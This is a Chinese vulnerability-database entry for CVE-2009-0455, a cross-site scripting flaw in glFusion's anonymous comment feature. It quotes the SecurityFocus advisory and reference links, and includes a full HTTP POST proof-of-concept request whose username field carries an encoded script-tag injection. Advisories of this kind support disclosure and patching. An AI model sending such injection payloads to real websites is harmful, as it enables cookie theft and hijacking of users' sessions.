glfusion 'lib-comment.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117355 漏洞类型 跨站脚本
发布时间 2009-02-05 更新时间 2009-02-11
CVE编号 CVE-2009-0455 CNNVD-ID CNNVD-200902-265
漏洞平台 PHP CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/32784
https://www.securityfocus.com/bid/33683
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-265
|漏洞详情
glfusion是一款开放源码的基于PHP开发的内容管理系统(CMS)。glFusion1.1.0,1.1.1及之前版本中的lib-comment.php里的匿名评论特性存在跨站脚本攻击漏洞。远程攻击者可以借助到comment.php的用户名参数,注入任意的web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/33683/info

glFusion is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

glFusion 1.1.0 and 1.1.1 are vulnerable; other versions may also be affected. 

POST /comment.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-
application, */*
Accept-Language: da
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding:
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: www.glfusion.org
Pragma: no-cache
Connection: Keep-Alive
sid=fileid_20&pid=0&type=filemgmt&_glsectoken=&comment=&uid=1&username=Anonymous+Use
r%22%3e%3csCrIpT%3ealert(1234)%3c%2fsCrIpT%3e&title=Hello&comment=Hello&comment_h
tml=Hello&postmode=html&captcha=47TXJC&csid=49816d4bcd4b&mode=Submit+Comment
|受影响的产品
glFusion glFusion 1.1.1 glFusion glFusion 1.1
|参考资料

来源:BID
名称:33683
链接:http://www.securityfocus.com/bid/33683
来源:XF
名称:glfusion-libcomment-xss(48603)
链接:http://xforce.iss.net/xforce/xfdb/48603
来源:www.glfusion.org
链接:http://www.glfusion.org/article.php/xsscomments
来源:MISC
链接:http://www.fortconsult.net/images/pdf/advisories/glFusion-xss-advisory.pdf
来源:SECUNIA
名称:33878
链接:http://secunia.com/advisories/33878